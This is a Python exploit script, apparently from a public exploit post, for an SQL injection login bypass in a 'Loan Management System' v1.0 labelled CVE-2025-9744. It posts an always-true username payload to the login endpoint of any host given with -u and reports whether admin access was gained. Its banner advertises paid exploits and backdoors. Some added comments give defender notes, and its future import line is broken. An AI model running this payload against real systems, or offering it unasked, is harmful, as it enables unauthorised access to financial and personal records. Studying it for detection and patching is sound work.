# -*- coding: utf-8 -*-
# Exploit [Loan Management System] v1.0 - SQL Injection
# Google Dork: N/A
# Date: 20/10/2025
# Exploit Author: CodeB0ss
# Vendor: Loan Management System
# Software Link: https://www.loanpro.io/
# Version: <= 1.0.0
# Tested on: Windows
# CVE : CVE-2025-9744
# CVSS Score : 10
from future import print_function
import requests
import sys
# Start-up text printed by main(): author credits, advertising for the
# author's channels, and the one-line usage hint for the -u option.
# NOTE(review): the product attribution, vendor link and CVSS value in the
# file header are the author's claims; confirm them against the CVE record
# before using them for triage.
banner = '''
-#-
bY t.me/uncodeboss
CVE-2025-9744 => [Loan Management System] v1.0 - SQL Injection
[Notification] : Become a VP user and get all the exploits and tools,
backdoors
t.me/realcodeb0ss . 35% Discount Prefer Code : 9QzkLw
[Usage] :
python CVE-2025-9744.py -u http/https or just example.com.
'''
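# Best-effort: silence urllib3's warnings. The requests further down are sent
# with verify=False, so without this every call would emit a certificate
# warning. Anyone running this should be aware that TLS validation is off and
# that the warning about it has been hidden on purpose.
try:
    requests.packages.urllib3.disable_warnings()
except Exception:
    # The attribute path may be missing in some requests builds; ignoring the
    # failure is harmless. A bare ``except:`` would also have swallowed
    # KeyboardInterrupt and SystemExit.
    pass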
def codeb0ssexp(codeb0ss_base):
    """Probe one host's login endpoint for the SQL injection and print a verdict.

    The target is normalised to a base URL: ``http://`` is assumed when no
    scheme is given and a trailing ``/`` is stripped. A POST is sent to
    ``/ajax.php?action=login`` whose ``username`` field carries a quote-break,
    an always-true ``or`` condition and a trailing comment marker. A GET to
    ``/index.php?page=home`` follows on the same session. The verdict is plain
    keyword matching over both response bodies, so it is an indication of an
    authentication bypass, not proof.

    Defender notes: these requests stand out in access logs by the fixed
    User-Agent string set below and by quote/comment characters in the
    ``username`` field of a login POST. On the application side the remedy is
    to bind the login credentials as query parameters instead of building the
    SQL statement from the raw form values.

    Returns:
        0 when every marker matched ("Vulnerable"), 2 when they did not
        ("Not_Vulnerable"), 1 when requests raised a RequestException.
    """
    if not codeb0ss_base.startswith("http://") and not codeb0ss_base.startswith("https://"):
        codeb0ss_base = "http://" + codeb0ss_base
    base_url = codeb0ss_base.rstrip("/")
    # One Session for both requests, so cookies set by the POST are sent with the GET.
    cdb0s = requests.Session()
    cdb0s.headers.update({
        'User-Agent': 'Mozilla/5.0 (https://t.me/realcodeb0ss) Gecko/20100101 Firefox/113.0',
        'Content-Type': 'application/x-www-form-urlencoded'
    })
    # ANSI colour codes; no reset sequence is ever printed after them.
    red = "\033[91m"
    green = "\033[92m"
    post_path = "/ajax.php?action=login"
    get_path = "/index.php?page=home"
    post_url = base_url + post_path
    get_url = base_url + get_path
    # The value is percent-encoded by hand and sent as a raw string body, so
    # requests does not encode it again.
    username = "admin'+or+'1'%3D'1'%23"
    # Arbitrary value; presumably irrelevant once the username alters the query.
    password = "expbycodeb0ss"
    payload = "username={}&password={}".format(username, password)
    try:
        # verify=False: TLS certificates are not validated for either request.
        r_post = cdb0s.post(post_url, data=payload, timeout=10, verify=False)
        r_get = cdb0s.get(get_url, timeout=10, verify=False)
        try:
            combined = (r_post.text or "") + (r_get.text or "")
        except Exception:
            # NOTE(review): on Python 3 .content is bytes, so this fallback
            # would mix bytes and str; it looks like a Python 2 leftover.
            combined = (r_post.content or "") + (r_get.content or "")
        # All three markers must appear somewhere in the two bodies together.
        group1 = ["window.start_load", "Welcome back Admin", "Loan Management System"]
        group1_ok = all(w in combined for w in group1)
        # NOTE(review): "login-form" is required in addition to the admin
        # greeting; which response supplies each marker cannot be told from here.
        group2_ok = ("login-form" in combined)
        if group1_ok and group2_ok:
            print(" - " + base_url + " --> " + green + "Vulnerable")
            print(" - {}".format(post_url))
            print(" - {}".format(get_url))
            return 0
        else:
            print(" - " + base_url + " --> " + red + "Not_Vulnerable")
            return 2
    except requests.exceptions.RequestException as e:
        # Every RequestException (not only timeouts) is reported as "Time0ut";
        # the exception object itself is unused.
        print(" - " + base_url + " --> " + red + "Time0ut")
        return 1
def startexp():
    """Return the command-line value that follows the first ``-u``, or None.

    None is returned both when ``-u`` is absent and when it is the last
    argument with nothing after it.
    """
    args = sys.argv
    try:
        flag_pos = args.index('-u')
    except ValueError:
        return None
    # Slicing avoids an IndexError when -u is the final argument.
    following = args[flag_pos + 1:flag_pos + 2]
    return following[0] if following else None
def main():
    """Print the banner, read the ``-u`` target and exit with the check's status.

    Exits with 1 when no target was supplied; otherwise the process exit code
    is whatever codeb0ssexp() returned.
    """
    print(banner)
    target = startexp()
    if target:
        sys.exit(codeb0ssexp(target))
    sys.exit(1)
# Run the check only when the file is executed as a script, not on import.
if __name__ == "__main__":
    main()